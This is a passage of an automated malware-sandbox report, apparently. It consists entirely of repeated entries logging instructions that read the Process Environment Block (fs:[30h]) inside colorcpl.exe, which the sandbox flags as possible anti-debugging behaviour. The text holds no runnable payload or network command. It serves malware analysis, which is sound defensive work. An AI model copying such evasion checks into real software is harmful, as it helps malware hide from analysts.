              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E631F50 mov eax, dword ptr fs:[00000030h]3_2_1E631F50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E667F51 mov eax, dword ptr fs:[00000030h]3_2_1E667F51
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EDF2F mov eax, dword ptr fs:[00000030h]3_2_1E6EDF2F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D7F3E mov eax, dword ptr fs:[00000030h]3_2_1E6D7F3E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B1F13 mov eax, dword ptr fs:[00000030h]3_2_1E6B1F13
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BDF10 mov eax, dword ptr fs:[00000030h]3_2_1E6BDF10
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66BFEC mov eax, dword ptr fs:[00000030h]3_2_1E66BFEC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E633FC2 mov eax, dword ptr fs:[00000030h]3_2_1E633FC2
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E661FCD mov eax, dword ptr fs:[00000030h]3_2_1E661FCD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EBFC0 mov ecx, dword ptr fs:[00000030h]3_2_1E6EBFC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EBFC0 mov eax, dword ptr fs:[00000030h]3_2_1E6EBFC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E703FC0 mov eax, dword ptr fs:[00000030h]3_2_1E703FC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62BFD0 mov eax, dword ptr fs:[00000030h]3_2_1E62BFD0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B3FD7 mov eax, dword ptr fs:[00000030h]3_2_1E6B3FD7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66BFB0 mov eax, dword ptr fs:[00000030h]3_2_1E66BFB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E671FB8 mov eax, dword ptr fs:[00000030h]3_2_1E671FB8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62FF90 mov edi, dword ptr fs:[00000030h]3_2_1E62FF90
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E641F92 mov ecx, dword ptr fs:[00000030h]3_2_1E641F92
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E641F92 mov eax, dword ptr fs:[00000030h]3_2_1E641F92
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E641F92 mov ecx, dword ptr fs:[00000030h]3_2_1E641F92
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E641F92 mov eax, dword ptr fs:[00000030h]3_2_1E641F92
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E641F92 mov ecx, dword ptr fs:[00000030h]3_2_1E641F92
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E641F92 mov eax, dword ptr fs:[00000030h]3_2_1E641F92
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E641F92 mov ecx, dword ptr fs:[00000030h]3_2_1E641F92
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E641F92 mov eax, dword ptr fs:[00000030h]3_2_1E641F92
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D3F90 mov eax, dword ptr fs:[00000030h]3_2_1E6D3F90
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E641C60 mov eax, dword ptr fs:[00000030h]3_2_1E641C60
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E661C7C mov eax, dword ptr fs:[00000030h]3_2_1E661C7C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFC4F mov eax, dword ptr fs:[00000030h]3_2_1E6EFC4F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627C40 mov eax, dword ptr fs:[00000030h]3_2_1E627C40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627C40 mov ecx, dword ptr fs:[00000030h]3_2_1E627C40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627C40 mov eax, dword ptr fs:[00000030h]3_2_1E627C40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6FDC27 mov eax, dword ptr fs:[00000030h]3_2_1E6FDC27
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E701C3C mov eax, dword ptr fs:[00000030h]3_2_1E701C3C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B9C32 mov eax, dword ptr fs:[00000030h]3_2_1E6B9C32
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66BC3B mov esi, dword ptr fs:[00000030h]3_2_1E66BC3B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E70BC01 mov eax, dword ptr fs:[00000030h]3_2_1E70BC01
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BBC10 mov eax, dword ptr fs:[00000030h]3_2_1E6BBC10
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BBC10 mov ecx, dword ptr fs:[00000030h]3_2_1E6BBC10
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D1CF9 mov eax, dword ptr fs:[00000030h]3_2_1E6D1CF9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E641CC7 mov eax, dword ptr fs:[00000030h]3_2_1E641CC7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E665CC0 mov eax, dword ptr fs:[00000030h]3_2_1E665CC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B3CDB mov eax, dword ptr fs:[00000030h]3_2_1E6B3CDB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DFCDF mov eax, dword ptr fs:[00000030h]3_2_1E6DFCDF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627CD5 mov eax, dword ptr fs:[00000030h]3_2_1E627CD5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62DCA0 mov eax, dword ptr fs:[00000030h]3_2_1E62DCA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFCAB mov eax, dword ptr fs:[00000030h]3_2_1E6EFCAB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65FCA0 mov ecx, dword ptr fs:[00000030h]3_2_1E65FCA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65FCA0 mov eax, dword ptr fs:[00000030h]3_2_1E65FCA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66BCA0 mov eax, dword ptr fs:[00000030h]3_2_1E66BCA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66BCA0 mov eax, dword ptr fs:[00000030h]3_2_1E66BCA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66BCA0 mov ecx, dword ptr fs:[00000030h]3_2_1E66BCA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66BCA0 mov eax, dword ptr fs:[00000030h]3_2_1E66BCA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E633C84 mov eax, dword ptr fs:[00000030h]3_2_1E633C84
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E633C84 mov eax, dword ptr fs:[00000030h]3_2_1E633C84
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E633C84 mov eax, dword ptr fs:[00000030h]3_2_1E633C84
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E633C84 mov eax, dword ptr fs:[00000030h]3_2_1E633C84
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DFD78 mov eax, dword ptr fs:[00000030h]3_2_1E6DFD78
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DFD78 mov eax, dword ptr fs:[00000030h]3_2_1E6DFD78
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DFD78 mov eax, dword ptr fs:[00000030h]3_2_1E6DFD78
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DFD78 mov eax, dword ptr fs:[00000030h]3_2_1E6DFD78
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DFD78 mov eax, dword ptr fs:[00000030h]3_2_1E6DFD78
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E637D75 mov eax, dword ptr fs:[00000030h]3_2_1E637D75
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E637D75 mov eax, dword ptr fs:[00000030h]3_2_1E637D75
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6E9D70 mov eax, dword ptr fs:[00000030h]3_2_1E6E9D70
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6E9D70 mov eax, dword ptr fs:[00000030h]3_2_1E6E9D70
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627D41 mov eax, dword ptr fs:[00000030h]3_2_1E627D41
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov ecx, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov ecx, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov ecx, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov ecx, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov ecx, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov ecx, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66BD4E mov eax, dword ptr fs:[00000030h]3_2_1E66BD4E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66BD4E mov eax, dword ptr fs:[00000030h]3_2_1E66BD4E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BDD47 mov eax, dword ptr fs:[00000030h]3_2_1E6BDD47
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F1D5A mov eax, dword ptr fs:[00000030h]3_2_1E6F1D5A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F1D5A mov eax, dword ptr fs:[00000030h]3_2_1E6F1D5A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F1D5A mov eax, dword ptr fs:[00000030h]3_2_1E6F1D5A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F1D5A mov eax, dword ptr fs:[00000030h]3_2_1E6F1D5A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BFD2A mov eax, dword ptr fs:[00000030h]3_2_1E6BFD2A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BFD2A mov eax, dword ptr fs:[00000030h]3_2_1E6BFD2A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D00 mov eax, dword ptr fs:[00000030h]3_2_1E643D00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6FDDC6 mov eax, dword ptr fs:[00000030h]3_2_1E6FDDC6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EDDC7 mov eax, dword ptr fs:[00000030h]3_2_1E6EDDC7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BDDC0 mov eax, dword ptr fs:[00000030h]3_2_1E6BDDC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E633DD0 mov eax, dword ptr fs:[00000030h]3_2_1E633DD0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E633DD0 mov eax, dword ptr fs:[00000030h]3_2_1E633DD0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E669DAF mov eax, dword ptr fs:[00000030h]3_2_1E669DAF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63FDA9 mov eax, dword ptr fs:[00000030h]3_2_1E63FDA9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C5DA0 mov eax, dword ptr fs:[00000030h]3_2_1E6C5DA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C5DA0 mov eax, dword ptr fs:[00000030h]3_2_1E6C5DA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C5DA0 mov eax, dword ptr fs:[00000030h]3_2_1E6C5DA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C5DA0 mov ecx, dword ptr fs:[00000030h]3_2_1E6C5DA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E64DDB1 mov eax, dword ptr fs:[00000030h]3_2_1E64DDB1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E64DDB1 mov eax, dword ptr fs:[00000030h]3_2_1E64DDB1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E64DDB1 mov eax, dword ptr fs:[00000030h]3_2_1E64DDB1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BDDB1 mov eax, dword ptr fs:[00000030h]3_2_1E6BDDB1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62FD80 mov eax, dword ptr fs:[00000030h]3_2_1E62FD80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E629D96 mov eax, dword ptr fs:[00000030h]3_2_1E629D96
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E629D96 mov eax, dword ptr fs:[00000030h]3_2_1E629D96
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E629D96 mov ecx, dword ptr fs:[00000030h]3_2_1E629D96
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C3A78 mov eax, dword ptr fs:[00000030h]3_2_1E6C3A78
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C3A78 mov eax, dword ptr fs:[00000030h]3_2_1E6C3A78
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C3A78 mov eax, dword ptr fs:[00000030h]3_2_1E6C3A78
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C3A78 mov eax, dword ptr fs:[00000030h]3_2_1E6C3A78
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C3A78 mov eax, dword ptr fs:[00000030h]3_2_1E6C3A78
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C3A78 mov eax, dword ptr fs:[00000030h]3_2_1E6C3A78
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E629A40 mov ecx, dword ptr fs:[00000030h]3_2_1E629A40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DA20 mov eax, dword ptr fs:[00000030h]3_2_1E65DA20
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DA20 mov eax, dword ptr fs:[00000030h]3_2_1E65DA20
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63BA30 mov eax, dword ptr fs:[00000030h]3_2_1E63BA30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63BA30 mov ecx, dword ptr fs:[00000030h]3_2_1E63BA30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63BA30 mov eax, dword ptr fs:[00000030h]3_2_1E63BA30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63BA30 mov eax, dword ptr fs:[00000030h]3_2_1E63BA30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63BA30 mov eax, dword ptr fs:[00000030h]3_2_1E63BA30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63BA30 mov eax, dword ptr fs:[00000030h]3_2_1E63BA30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DBA0B mov eax, dword ptr fs:[00000030h]3_2_1E6DBA0B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DBA0B mov eax, dword ptr fs:[00000030h]3_2_1E6DBA0B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DBA0B mov eax, dword ptr fs:[00000030h]3_2_1E6DBA0B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DBA0B mov eax, dword ptr fs:[00000030h]3_2_1E6DBA0B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E665A01 mov eax, dword ptr fs:[00000030h]3_2_1E665A01
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E665A01 mov ecx, dword ptr fs:[00000030h]3_2_1E665A01
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E665A01 mov eax, dword ptr fs:[00000030h]3_2_1E665A01
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E665A01 mov eax, dword ptr fs:[00000030h]3_2_1E665A01
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFA02 mov eax, dword ptr fs:[00000030h]3_2_1E6EFA02
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62BA10 mov eax, dword ptr fs:[00000030h]3_2_1E62BA10
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6ADA1D mov eax, dword ptr fs:[00000030h]3_2_1E6ADA1D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D7A11 mov edi, dword ptr fs:[00000030h]3_2_1E6D7A11
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E659A18 mov ecx, dword ptr fs:[00000030h]3_2_1E659A18
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62BAE0 mov eax, dword ptr fs:[00000030h]3_2_1E62BAE0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B1ACB mov eax, dword ptr fs:[00000030h]3_2_1E6B1ACB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B1ACB mov ecx, dword ptr fs:[00000030h]3_2_1E6B1ACB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C5AD0 mov eax, dword ptr fs:[00000030h]3_2_1E6C5AD0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65BADA mov eax, dword ptr fs:[00000030h]3_2_1E65BADA
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DDAAC mov ecx, dword ptr fs:[00000030h]3_2_1E6DDAAC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DDAAC mov ecx, dword ptr fs:[00000030h]3_2_1E6DDAAC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DDAAC mov eax, dword ptr fs:[00000030h]3_2_1E6DDAAC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63BAA0 mov eax, dword ptr fs:[00000030h]3_2_1E63BAA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63BAA0 mov eax, dword ptr fs:[00000030h]3_2_1E63BAA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62FAA4 mov ecx, dword ptr fs:[00000030h]3_2_1E62FAA4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DAAE mov eax, dword ptr fs:[00000030h]3_2_1E65DAAE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6E1AA3 mov eax, dword ptr fs:[00000030h]3_2_1E6E1AA3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6E1AA3 mov eax, dword ptr fs:[00000030h]3_2_1E6E1AA3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6E1AA3 mov eax, dword ptr fs:[00000030h]3_2_1E6E1AA3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627A80 mov eax, dword ptr fs:[00000030h]3_2_1E627A80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627A80 mov eax, dword ptr fs:[00000030h]3_2_1E627A80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627A80 mov eax, dword ptr fs:[00000030h]3_2_1E627A80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFA87 mov eax, dword ptr fs:[00000030h]3_2_1E6EFA87
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D3B60 mov eax, dword ptr fs:[00000030h]3_2_1E6D3B60
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D3B60 mov eax, dword ptr fs:[00000030h]3_2_1E6D3B60
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D3B60 mov eax, dword ptr fs:[00000030h]3_2_1E6D3B60
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D3B60 mov eax, dword ptr fs:[00000030h]3_2_1E6D3B60
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D3B60 mov eax, dword ptr fs:[00000030h]3_2_1E6D3B60
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62FB4C mov edi, dword ptr fs:[00000030h]3_2_1E62FB4C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C5B50 mov eax, dword ptr fs:[00000030h]3_2_1E6C5B50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C5B50 mov eax, dword ptr fs:[00000030h]3_2_1E6C5B50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E669B28 mov eax, dword ptr fs:[00000030h]3_2_1E669B28
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E669B28 mov eax, dword ptr fs:[00000030h]3_2_1E669B28
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E703B10 mov eax, dword ptr fs:[00000030h]3_2_1E703B10
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFB0C mov eax, dword ptr fs:[00000030h]3_2_1E6EFB0C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DB00 mov eax, dword ptr fs:[00000030h]3_2_1E65DB00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DB00 mov eax, dword ptr fs:[00000030h]3_2_1E65DB00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DB00 mov eax, dword ptr fs:[00000030h]3_2_1E65DB00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DB00 mov eax, dword ptr fs:[00000030h]3_2_1E65DB00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DB00 mov eax, dword ptr fs:[00000030h]3_2_1E65DB00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DB00 mov edx, dword ptr fs:[00000030h]3_2_1E65DB00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E631B04 mov eax, dword ptr fs:[00000030h]3_2_1E631B04
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E631B04 mov eax, dword ptr fs:[00000030h]3_2_1E631B04
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E671BEF mov eax, dword ptr fs:[00000030h]3_2_1E671BEF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E671BEF mov eax, dword ptr fs:[00000030h]3_2_1E671BEF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFBF3 mov eax, dword ptr fs:[00000030h]3_2_1E6EFBF3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E639BC4 mov eax, dword ptr fs:[00000030h]3_2_1E639BC4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627BCD mov eax, dword ptr fs:[00000030h]3_2_1E627BCD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627BCD mov ecx, dword ptr fs:[00000030h]3_2_1E627BCD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643BD6 mov eax, dword ptr fs:[00000030h]3_2_1E643BD6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643BD6 mov eax, dword ptr fs:[00000030h]3_2_1E643BD6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643BD6 mov eax, dword ptr fs:[00000030h]3_2_1E643BD6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643BD6 mov eax, dword ptr fs:[00000030h]3_2_1E643BD6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643BD6 mov eax, dword ptr fs:[00000030h]3_2_1E643BD6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BFBDC mov eax, dword ptr fs:[00000030h]3_2_1E6BFBDC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BFBDC mov eax, dword ptr fs:[00000030h]3_2_1E6BFBDC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BFBDC mov eax, dword ptr fs:[00000030h]3_2_1E6BFBDC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DBA0 mov eax, dword ptr fs:[00000030h]3_2_1E65DBA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DBA0 mov eax, dword ptr fs:[00000030h]3_2_1E65DBA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DBA0 mov eax, dword ptr fs:[00000030h]3_2_1E65DBA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DBA0 mov eax, dword ptr fs:[00000030h]3_2_1E65DBA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DBA0 mov eax, dword ptr fs:[00000030h]3_2_1E65DBA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DBA0 mov eax, dword ptr fs:[00000030h]3_2_1E65DBA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F9B8B mov eax, dword ptr fs:[00000030h]3_2_1E6F9B8B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F9B8B mov eax, dword ptr fs:[00000030h]3_2_1E6F9B8B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E703B80 mov eax, dword ptr fs:[00000030h]3_2_1E703B80
